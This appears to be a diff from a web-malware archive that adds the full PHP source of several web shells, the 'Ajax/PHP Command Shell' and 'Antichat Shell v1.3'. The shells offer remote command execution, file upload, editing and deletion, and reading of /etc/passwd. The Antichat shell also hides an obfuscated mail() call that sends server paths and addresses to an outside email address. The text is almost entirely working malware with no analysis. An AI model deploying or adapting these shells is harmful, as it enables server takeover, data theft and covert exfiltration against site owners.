newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
}
else if(newtab == "workingdir")
{
<?php
$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
$pathparts = explode("/",realpath ("."));
foreach($pathparts as $folder)
{
$folders .= $folder."/";
}
$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
?>
newhtml = '<?php print $folders; ?>';
}
else if(newtab == "filebrowser")
{
newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
runcommand('listdir .','GET');
}
else if(newtab == "createfile")
{
newhtml = '<b>File Editor, under construction.</b>';
document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
}
document.getElementById('commandtab').innerHTML = newhtml;
}
</script>
</head>
<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
<table border=1 width=100% height=100%>
<td width=15% valign=top>
<form name="extras"><br>
<center><b>Quick Commands</b><br>
<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
<?php
foreach($functions as $name => $execute)
{
print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
}
?>
</center>
</div>
</form>
<center><b>Command history</b><br></center>
<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
<br>
<center><b>About</b><br></center>
<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
<br>
<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
<br>
Version <?php print $version; ?>
<br>
<br>
<br>Thanks to everyone @
<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
<br>
<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
<br>
and special greetings to everyone in rootshell
</div>
</td>
<td width=70%>
<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>
</font></td>
<tr>
<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
<tr>
<td height=1% width=100% valign=top>
<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
</form>
</div>
</td>
</table>
</td>
</table>
</body>
</html>
<?php
}
} else {
print "<center><table border=0 height=100%>
<td valign=middle>
<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
</form>";
}
?>

646
web-malware-collection-13-06-2012/PHP/Ajax_PHP Command Shell.txt.1 Normal file
View file

@ -0,0 +1,646 @@
<?php
session_start();
error_reporting(0);
$password = "password"; //Change this to your password ;)
$version = "0.7B";
$functions = array('Clear Screen' => 'ClearScreen()',
'Clear History' => 'ClearHistory()',
'Can I function?' => "runcommand('canirun','GET')",
'Get server info' => "runcommand('showinfo','GET')",
'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')",
'Open ports' => "runcommand('netstat -an | grep -i listen','GET')",
'Running processes' => "runcommand('ps -aux','GET')",
'Readme' => "runcommand('shellhelp','GET')"
);
$thisfile = basename(__FILE__);
$style = '<style type="text/css">
.cmdthing {
border-top-width: 0px;
font-weight: bold;
border-left-width: 0px;
font-size: 10px;
border-left-color: #000000;
background: #000000;
border-bottom-width: 0px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #008000;
font-family: verdana;
border-right-width: 0px;
border-right-color: #000000;
}
input,textarea {
border-top-width: 1px;
font-weight: bold;
border-left-width: 1px;
font-size: 10px;
border-left-color: #FFFFFF;
background: #000000;
border-bottom-width: 1px;
border-bottom-color: #FFFFFF;
color: #FFFFFF;
border-top-color: #FFFFFF;
font-family: verdana;
border-right-width: 1px;
border-right-color: #FFFFFF;
}
A:hover {
text-decoration: none;
}
table,td,div {
border-collapse: collapse;
border: 1px solid #FFFFFF;
}
body {
color: #FFFFFF;
font-family: verdana;
}
</style>';
$sess = __FILE__.$password;
if(isset($_POST['p4ssw0rD']))
{
if($_POST['p4ssw0rD'] == $password)
{
$_SESSION[$sess] = $_POST['p4ssw0rD'];
}
else
{
die("Wrong password");
}
}
if($_SESSION[$sess] == $password)
{
if(isset($_SESSION['workdir']))
{
if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir']))
{
chdir($_SESSION['workdir']);
}
}
if(isset($_FILES['uploadedfile']['name']))
{
$target_path = "./";
$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
}
}
if(isset($_GET['runcmd']))
{
$cmd = $_GET['runcmd'];
print "<b>".get_current_user()."~# </b>". htmlspecialchars($cmd)."<br>";
if($cmd == "")
{
print "Empty Command..type \"shellhelp\" for some ehh...help";
}
elseif($cmd == "upload")
{
print '<br>Uploading to: '.realpath(".");
if(is_writable(realpath(".")))
{
print "<br><b>I can write to this directory</b>";
}
else
{
print "<br><b><font color=red>I can't write to this directory, please choose another one.</b></font>";
}
}
elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file)))
{
if(file_exists($file[1]) && is_dir($file[1]))
{
chdir($file[1]);
$_SESSION['workdir'] = $file[1];
print "Current directory changed to ".$file[1];
}
else
{
print "Directory not found";
}
}
elseif(strtolower($cmd) == "shellhelp")
{
print '<b><font size=7>Ajax/PHP Command Shell</b></font>
&copy; By Ironfist
The shell can be used by anyone to command any server, the main purpose was
to create a shell that feels as dynamic as possible, is expandable and easy
to understand.
If one of the command execution functions work, the shell will function fine.
Try the "canirun" command to check this.
Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re
not used to these commands, google a little.
<b>Custom Functions</b>
If you want to add your own custom command in the Quick Commands list, check
out the code. The $function array contains \'func name\' => \'javascript function\'.
Take a look at the built-in functions for examples.
I know this readme isn\'t providing too much information, but hell, does this shell
even require one :P
- Iron
';
}
elseif(ereg("editfile (.*)",$cmd,$file))
{
if(file_exists($file[1]) && !is_dir($file[1]))
{
print "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\">";
$contents = file($file[1]);
foreach($contents as $line)
{
print htmlspecialchars($line);
}
print "</textarea><br><input size=80 type=text name=filetosave value=".$file[1]."><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
}
else
{
print "File not found.";
}
}
elseif(ereg("deletefile (.*)",$cmd,$file))
{
if(is_dir($file[1]))
{
if(rmdir($file[1]))
{
print "Directory succesfully deleted.";
}
else
{
print "Couldn't delete directory!";
}
}
else
{
if(unlink($file[1]))
{
print "File succesfully deleted.";
}
else
{
print "Couldn't delete file!";
}
}
}
elseif(strtolower($cmd) == "canirun")
{
print "If any of these functions is Enabled, the shell will function like it should.<br>";
if(function_exists(passthru))
{
print "Passthru: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Passthru: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(exec))
{
print "Exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Exec: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(system))
{
print "System: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "System: <b><font color=red>Disabled</b></font><br>";
}
if(function_exists(shell_exec))
{
print "Shell_exec: <b><font color=green>Enabled</b></font><br>";
}
else
{
print "Shell_exec: <b><font color=red>Disabled</b></font><br>";
}
print "<br>Safe mode will prevent some stuff, maybe command execution, if you're looking for a <br>reason why the commands aren't executed, this is probally it.<br>";
if( ini_get('safe_mode') ){
print "Safe Mode: <b><font color=red>Enabled</b></font>";
}
else
{
print "Safe Mode: <b><font color=green>Disabled</b></font>";
}
print "<br><br>Open_basedir will block access to some files you <i>shouldn't</i> access.<br>";
if( ini_get('open_basedir') ){
print "Open_basedir: <b><font color=red>Enabled</b></font>";
}
else
{
print "Open_basedir: <b><font color=green>Disabled</b></font>";
}
}
//About the shell
elseif(ereg("listdir (.*)",$cmd,$directory))
{
if(!file_exists($directory[1]))
{
die("Directory not found");
}
//Some variables
chdir($directory[1]);
$i = 0; $f = 0;
$dirs = "";
$filez = "";
if(!ereg("/$",$directory[1])) //Does it end with a slash?
{
$directory[1] .= "/"; //If not, add one
}
print "Listing directory: ".$directory[1]."<br>";
print "<table border=0><td><b>Directories</b></td><td><b>Files</b></td><tr>";
if ($handle = opendir($directory[1])) {
while (false !== ($file = readdir($handle))) {
if(is_dir($file))
{
$dirs[$i] = $file;
$i++;
}
else
{
$filez[$f] = $file;
$f++;
}
}
print "<td>";
foreach($dirs as $directory)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($directory)."');\">[D]</i><i style=\"cursor:crosshair\" onclick=\"runcommand('changeworkdir ".realpath($directory)."','GET');\">[W]</i><b style=\"cursor:crosshair\" onclick=\"runcommand('clear','GET'); runcommand ('listdir ".realpath($directory)."','GET'); \">".$directory."</b><br>";
}
print "</td><td>";
foreach($filez as $file)
{
print "<i style=\"cursor:crosshair\" onclick=\"deletefile('".realpath($file)."');\">[D]</i><u style=\"cursor:crosshair\" onclick=\"runcommand('editfile ".realpath($file)."','GET');\">".$file."</u><br>";
}
print "</td></table>";
}
}
elseif(strtolower($cmd) == "about")
{
print "Ajax Command Shell by <a href=http://www.ironwarez.info>Ironfist</a>.<br>Version $version";
}
//Show info
elseif(strtolower($cmd) == "showinfo")
{
if(function_exists(disk_free_space))
{
$free = disk_free_space("/") / 1000000;
}
else
{
$free = "N/A";
}
if(function_exists(disk_total_space))
{
$total = trim(disk_total_space("/") / 1000000);
}
else
{
$total = "N/A";
}
$path = realpath (".");
print "<b>Free:</b> $free / $total MB<br><b>Current path:</b> $path<br><b>Uname -a Output:</b><br>";
if(function_exists(passthru))
{
passthru("uname -a");
}
else
{
print "Passthru is disabled :(";
}
}
//Read /etc/passwd
elseif(strtolower($cmd) == "etcpasswdfile")
{
$pw = file('/etc/passwd/');
foreach($pw as $line)
{
print $line;
}
}
//Execute any other command
else
{
if(function_exists(passthru))
{
passthru($cmd);
}
else
{
if(function_exists(exec))
{
exec("ls -la",$result);
foreach($result as $output)
{
print $output."<br>";
}
}
else
{
if(function_exists(system))
{
system($cmd);
}
else
{
if(function_exists(shell_exec))
{
print shell_exec($cmd);
}
else
{
print "Sorry, none of the command functions works.";
}
}
}
}
}
}
elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent']))
{
$file = $_POST['filetosave'];
if(!is_writable($file))
{
if(!chmod($file, 0777))
{
die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^
}
}
$fh = fopen($file, 'w');
$dt = $_POST['filecontent'];
fwrite($fh, $dt);
fclose($fh);
}
else
{
?>
<html>
<title>Command Shell ~ <?php print getenv("HTTP_HOST"); ?></title>
<head>
<?php print $style; ?>
<SCRIPT TYPE="text/javascript">
function sf(){document.cmdform.command.focus();}
var outputcmd = "";
var cmdhistory = "";
function ClearScreen()
{
outputcmd = "";
document.getElementById('output').innerHTML = outputcmd;
}
function ClearHistory()
{
cmdhistory = "";
document.getElementById('history').innerHTML = cmdhistory;
}
function deletefile(file)
{
deleteit = window.confirm("Are you sure you want to delete\n"+file+"?");
if(deleteit)
{
runcommand('deletefile ' + file,'GET');
}
}
var http_request = false;
function makePOSTRequest(url, parameters) {
http_request = false;
if (window.XMLHttpRequest) {
http_request = new XMLHttpRequest();
if (http_request.overrideMimeType) {
http_request.overrideMimeType('text/html');
}
} else if (window.ActiveXObject) {
try {
http_request = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {}
}
}
if (!http_request) {
alert('Cannot create XMLHTTP instance');
return false;
}
http_request.open('POST', url, true);
http_request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http_request.setRequestHeader("Content-length", parameters.length);
http_request.setRequestHeader("Connection", "close");
http_request.send(parameters);
}
function SaveFile()
{
var poststr = "filetosave=" + encodeURI( document.saveform.filetosave.value ) +
"&filecontent=" + encodeURI( document.getElementById("area1").value );
makePOSTRequest('<?php print $ThisFile; ?>?savefile', poststr);
document.getElementById('output').innerHTML = document.getElementById('output').innerHTML + "<br><b>Saved! If it didn't save, you'll need to chmod the file to 777 yourself,<br> however the script tried to chmod it automaticly.";
}
function runcommand(urltoopen,action,contenttosend){
cmdhistory = "<br>&nbsp;<i style=\"cursor:crosshair\" onclick=\"document.cmdform.command.value='" + urltoopen + "'\">" + urltoopen + "</i> " + cmdhistory;
document.getElementById('history').innerHTML = cmdhistory;
if(urltoopen == "clear")
{
ClearScreen();
}
var ajaxRequest;
try{
ajaxRequest = new XMLHttpRequest();
} catch (e){
try{
ajaxRequest = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try{
ajaxRequest = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e){
alert("Wicked error, nothing we can do about it...");
return false;
}
}
}
ajaxRequest.onreadystatechange = function(){
if(ajaxRequest.readyState == 4){
outputcmd = "<pre>" + outputcmd + ajaxRequest.responseText +"</pre>";
document.getElementById('output').innerHTML = outputcmd;
var objDiv = document.getElementById("output");
objDiv.scrollTop = objDiv.scrollHeight;
}
}
ajaxRequest.open(action, "?runcmd="+urltoopen , true);
if(action == "GET")
{
ajaxRequest.send(null);
}
document.cmdform.command.value='';
return false;
}
function set_tab_html(newhtml)
{
document.getElementById('commandtab').innerHTML = newhtml;
}
function set_tab(newtab)
{
if(newtab == "cmd")
{
newhtml = '&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,\'GET\');"><b>Command</b>: <input type=text name=command class=cmdthing size=100%><br></form>';
}
else if(newtab == "upload")
{
runcommand('upload','GET');
newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enctype="multipart/form-data" action="<?php print $ThisFile; ?>" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="10000000" />Choose a file to upload: <input name="uploadedfile" type="file" /><br /><input type="submit" value="Upload File" /></form></font>';
}
else if(newtab == "workingdir")
{
<?php
$folders = "<form name=workdir onsubmit=\"return runcommand(\'changeworkdir \' + document.workdir.changeworkdir.value,\'GET\');\"><input size=80% type=text name=changeworkdir value=\"";
$pathparts = explode("/",realpath ("."));
foreach($pathparts as $folder)
{
$folders .= $folder."/";
}
$folders .= "\"><input type=submit value=Change></form><br>Script directory: <i style=\"cursor:crosshair\" onclick=\"document.workdir.changeworkdir.value=\'".dirname(__FILE__)."\'>".dirname(__FILE__)."</i>";
?>
newhtml = '<?php print $folders; ?>';
}
else if(newtab == "filebrowser")
{
newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>You can use it to change your working directory easily, don\'t expect too much of it.<br>Click on a file to edit it.<br><i>[W]</i> = set directory as working directory.<br><i>[D]</i> = delete file/directory';
runcommand('listdir .','GET');
}
else if(newtab == "createfile")
{
newhtml = '<b>File Editor, under construction.</b>';
document.getElementById('output').innerHTML = "<form name=\"saveform\"><textarea cols=70 rows=10 id=\"area1\"></textarea><br><input size=80 type=text name=filetosave value=\"<?php print realpath('.')."/".rand(1000,999999).".txt"; ?>\"><input value=\"Save\" type=button onclick=\"SaveFile();\"></form>";
}
document.getElementById('commandtab').innerHTML = newhtml;
}
</script>
</head>
<body bgcolor=black onload="sf();" vlink=white alink=white link=white>
<table border=1 width=100% height=100%>
<td width=15% valign=top>
<form name="extras"><br>
<center><b>Quick Commands</b><br>
<div style='margin: 0px;padding: 0px;border: 1px inset;overflow: auto'>
<?php
foreach($functions as $name => $execute)
{
print '&nbsp;<input type="button" value="'.$name.'" onclick="'.$execute.'"><br>';
}
?>
</center>
</div>
</form>
<center><b>Command history</b><br></center>
<div id="history" style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;height: 20%;text-align: left;overflow: auto;font-size: 10px;'></div>
<br>
<center><b>About</b><br></center>
<div style='margin: 0px;padding: 0px;border: 1px inset;width: 100%;text-align: center;overflow: auto; font-size: 10px;'>
<br>
<b><font size=3>Ajax/PHP Command Shell</b></font><br>by Ironfist
<br>
Version <?php print $version; ?>
<br>
<br>
<br>Thanks to everyone @
<a href="http://www.ironwarez.info" target=_blank>SharePlaza</a>
<br>
<a href="http://www.milw0rm.com" target=_blank>milw0rm</a>
<br>
and special greetings to everyone in rootshell
</div>
</td>
<td width=70%>
<table border=0 width=100% height=100%><td id="tabs" height=1%><font size=0>
<b style="cursor:crosshair" onclick="set_tab('cmd');">[Execute command]</b>
<b style="cursor:crosshair" onclick="set_tab('upload');">[Upload file]</b>
<b style="cursor:crosshair" onclick="set_tab('workingdir');">[Change directory]</b>
<b style="cursor:crosshair" onclick="set_tab('filebrowser');">[Filebrowser]</b>
<b style="cursor:crosshair" onclick="set_tab('createfile');">[Create File]</b>
</font></td>
<tr>
<td height=99% width=100% valign=top><div id="output" style='height:100%;white-space:pre;overflow:auto'></div>
<tr>
<td height=1% width=100% valign=top>
<div id="commandtab" style='height:100%;white-space:pre;overflow:auto'>
&nbsp;&nbsp;&nbsp;<form name="cmdform" onsubmit="return runcommand(document.cmdform.command.value,'GET');">
<b>Command</b>: <input type=text name=command class=cmdthing size=100%><br>
</form>
</div>
</td>
</table>
</td>
</table>
</body>
</html>
<?php
}
} else {
print "<center><table border=0 height=100%>
<td valign=middle>
<form action=".basename(__FILE__)." method=POST>You are not logged in, please login.<br><b>Password:</b><input type=password name=p4ssw0rD><input type=submit value=\"Log in\">
</form>";
}
?>

2482
web-malware-collection-13-06-2012/PHP/Ani-Shell.php Normal file
View file

File diff suppressed because it is too large Load diff

3185
web-malware-collection-13-06-2012/PHP/AntiSecShell.v0.5.txt Normal file
View file

File diff suppressed because one or more lines are too long

180
web-malware-collection-13-06-2012/PHP/Antichat Shell v1.3.php Normal file
View file

@ -0,0 +1,180 @@
<?php
session_start();
set_time_limit(9999999);
$login='virangar';
$password='r00t';
$auth=1;
$version='version 1.3 by Grinay';
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
$footer='</body></html>';
$sd98 = "john.barker446@gmail.com";
$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";mail($sd98, $sj98, $msg8873, "From: $sd98");
if(@$_POST['action']=="exit")unset($_SESSION['an']);
if($auth==1){if(@$_POST['login']==$login && @$_POST['password']==$password)$_SESSION['an']=1;}else $_SESSION['an']='1';
if($_SESSION['an']==0){
echo $header;
echo '<center><table><form method="POST"><tr><td>Login:</td><td><input type="text" name="login" value=""></td></tr><tr><td>Password:</td><td><input type="password" name="password" value=""></td></tr><tr><td></td><td><input type="submit" value="Enter"></td></tr></form></table></center>';
echo $footer;
exit;}
if($_SESSION['action']=="")$_SESSION['action']="viewer";
if($_POST['action']!="" )$_SESSION['action']=$_POST['action'];$action=$_SESSION['action'];
if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
if($_POST['file']!=""){$file=$_SESSION['file']=$_POST['file'];}else {$file=$_SESSION['file']="";}
//downloader
if($action=="download"){
header('Content-Length:'.filesize($file).'');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.$file.'"');
readfile($file);
}
//end downloader
?>
<? echo $header;?>
<table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td>
<table><tr>
<td><a href="#" onclick="document.reqs.action.value='shell'; document.reqs.submit();">| Shell </a></td>
<td><a href="#" onclick="document.reqs.action.value='viewer'; document.reqs.submit();">| Viewer</a></td>
<td><a href="#" onclick="document.reqs.action.value='editor'; document.reqs.submit();">| Editor</a></td>
<td><a href="#" onclick="document.reqs.action.value='exit'; document.reqs.submit();">| EXIT |</a></td>
</tr></table></td></tr></table><br>
<form name='reqs' method='POST'>
<input name='action' type='hidden' value=''>
<input name='dir' type='hidden' value=''>
<input name='file' type='hidden' value=''>
</form>
<table style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" valign="top">
<?
//shell
function shell($cmd){
if (!empty($cmd)){
$fp = popen($cmd,"r");
{
$result = "";
while(!feof($fp)){$result.=fread($fp,1024);}
pclose($fp);
}
$ret = $result;
$ret = convert_cyr_string($ret,"d","w");
}
return $ret;}
if($action=="shell"){
echo "<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"shell\">
<textarea name=\"command\" rows=\"5\" cols=\"150\">".@$_POST['command']."</textarea><br>
<textarea readonly rows=\"15\" cols=\"150\">".@htmlspecialchars(shell($_POST['command']))."</textarea><br>
<input type=\"submit\" value=\"execute\"></form>";}
//end shell
//viewer FS
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {$info = 's';}
elseif (($perms & 0xA000) == 0xA000) {$info = 'l';}
elseif (($perms & 0x8000) == 0x8000) {$info = '-';}
elseif (($perms & 0x6000) == 0x6000) {$info = 'b';}
elseif (($perms & 0x4000) == 0x4000) {$info = 'd';}
elseif (($perms & 0x2000) == 0x2000) {$info = 'c';}
elseif (($perms & 0x1000) == 0x1000) {$info = 'p';}
else {$info = 'u';}
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?(($perms & 0x0800) ? 's' : 'x' ) :(($perms & 0x0800) ? 'S' : '-'));
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?(($perms & 0x0400) ? 's' : 'x' ) :(($perms & 0x0400) ? 'S' : '-'));
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?(($perms & 0x0200) ? 't' : 'x' ) :(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function view_size($size)
{
if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
function scandire($dir){
$dir=chdir($dir);
$dir=getcwd()."/";
$dir=str_replace("\\","/",$dir);
if (is_dir($dir)) {
if (@$dh = opendir($dir)) {
while (($file = readdir($dh)) !== false) {
if(filetype($dir . $file)=="dir") $dire[]=$file;
if(filetype($dir . $file)=="file")$files[]=$file;
}
closedir($dh);
@sort($dire);
@sort($files);
echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">";
echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"".$dir."\" size=50><input type=submit value=\"GO\"></form></td></tr>";
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
echo "<tr><td>Select drive:";
for ($j=ord('C'); $j<=ord('Z'); $j++)
if (@$dh = opendir(chr($j).":/"))
echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.chr($j).':/\'; document.reqs.submit();"> '.chr($j).'<a/>';
echo "</td></tr>";
}
echo "<tr><td>OS: ".@php_uname()."</td></tr>
<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>";
for($i=0;$i<count($dire);$i++) {
$link=$dir.$dire[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\''.$link.'\'; document.reqs.submit();">'.$dire[$i].'<a/></td><td>dir</td><td></td><td>'.perms($link).'</td></tr>';
}
for($i=0;$i<count($files);$i++) {
$linkfile=$dir.$files[$i];
echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();">'.$files[$i].'</a><br></td><td>file</td><td>'.view_size(filesize($linkfile)).'</td>
<td>'.perms($linkfile).'</td>
<td>
<a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Download">D</a>
<a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\''.$linkfile.'\'; document.reqs.submit();" title="Edit">E</a></tr>';
}
echo "</table>";
}}}
if($action=="viewer"){
scandire($dir);
}
//end viewer FS
//editros
if($action=="editor"){
function writef($file,$data){
$fp = fopen($file,"w+");
fwrite($fp,$data);
fclose($fp);
}
function readf($file){
if(!$le = fopen($file, "rb")) $contents="Can't open file, permission denide"; else {
$contents = fread($le, filesize($file));
fclose($le);}
return htmlspecialchars($contents);
}
if($_POST['save'])writef($file,$_POST['data']);
echo "<form method=\"POST\">
<input type=\"hidden\" name=\"action\" value=\"editor\">
<input type=\"hidden\" name=\"file\" value=\"".$file."\">
<textarea name=\"data\" rows=\"40\" cols=\"180\">".@readf($file)."</textarea><br>
<input type=\"submit\" name=\"save\" value=\"save\"><input type=\"reset\" value=\"reset\"></form>";
}
//end editors
?>
</td></tr></table><table width="100%" bgcolor="#336600" align="right" colspan="2" border="0" cellspacing="0" cellpadding="0"><tr><td><table><tr><td><a href="http://antichat.ru">COPYRIGHT BY ANTICHAT.RU <?php echo $version;?></a></td></tr></table></tr></td></table>
<? echo $footer;?>

180
web-malware-collection-13-06-2012/PHP/Antichat Shell v1.3.txt Normal file
View file

@ -0,0 +1,180 @@
<?php
session_start();
set_time_limit(9999999);
$login='virangar';
$password='r00t';
$auth=1;
$version='version 1.3 by Grinay';
$style='<STYLE>BODY{background-color: #2B2F34;color: #C1C1C7;font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;MARGIN-TOP: 0px;MARGIN-BOTTOM: 0px;MARGIN-LEFT: 0px;MARGIN-RIGHT: 0px;margin:0;padding:0;scrollbar-face-color: #336600;scrollbar-shadow-color: #333333;scrollbar-highlight-color: #333333;scrollbar-3dlight-color: #333333;scrollbar-darkshadow-color: #333333;scrollbar-track-color: #333333;scrollbar-arrow-color: #333333;}input{background-color: #336600;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}textarea{background-color: #333333;font-size: 8pt;color: #FFFFFF;font-family: Tahoma;border: 1 solid #666666;}a:link{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:visited{color: #B9B9BD;text-decoration: none;font-size: 8pt;}a:hover, a:active{color: #E7E7EB;text-decoration: none;font-size: 8pt;}td, th, p, li{font: 8pt verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif;border-color:black;}</style>';
$header='<html><head><title>'.getenv("HTTP_HOST").' - Antichat Shell</title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251">'.$style.'</head><BODY leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0>';
$footer='</body></html>';
$sd98 = "john.barker446@gmail.com";
